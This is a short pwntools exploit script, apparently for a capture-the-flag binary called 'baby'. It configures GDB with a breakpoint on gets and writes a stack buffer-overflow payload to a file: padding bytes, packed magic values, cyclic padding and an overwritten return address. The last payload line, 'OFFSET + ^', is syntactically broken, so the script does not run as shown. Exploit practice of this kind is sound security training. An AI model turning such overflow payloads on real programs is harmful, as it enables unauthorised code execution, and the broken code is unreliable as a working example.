24 lines
477 B
Python
24 lines
477 B
Python
from pwn import *
|
|
elf = ELF(os.getcwd() + "/baby")
|
|
|
|
gs = '''
|
|
unset env LINES
|
|
unset env COLUMNS
|
|
set follow-fork-mode child
|
|
# br *0x5663c4b8
|
|
br gets
|
|
continue
|
|
'''
|
|
|
|
def start():
|
|
if args.GDB:
|
|
return gdb.debug(elf.path, gs)
|
|
else:
|
|
return process([elf.path])
|
|
|
|
# io = start()
|
|
# input("waiting...")
|
|
OFFSET = 0x56555000
|
|
with open("input", "wb+") as f:
|
|
f.write(b'A'*42 + p32(1) + p32(0xd34db33f) + cyclic(cyclic_find('caaa')) + p32(OFFSET + ^))
|
|
# io.interactive |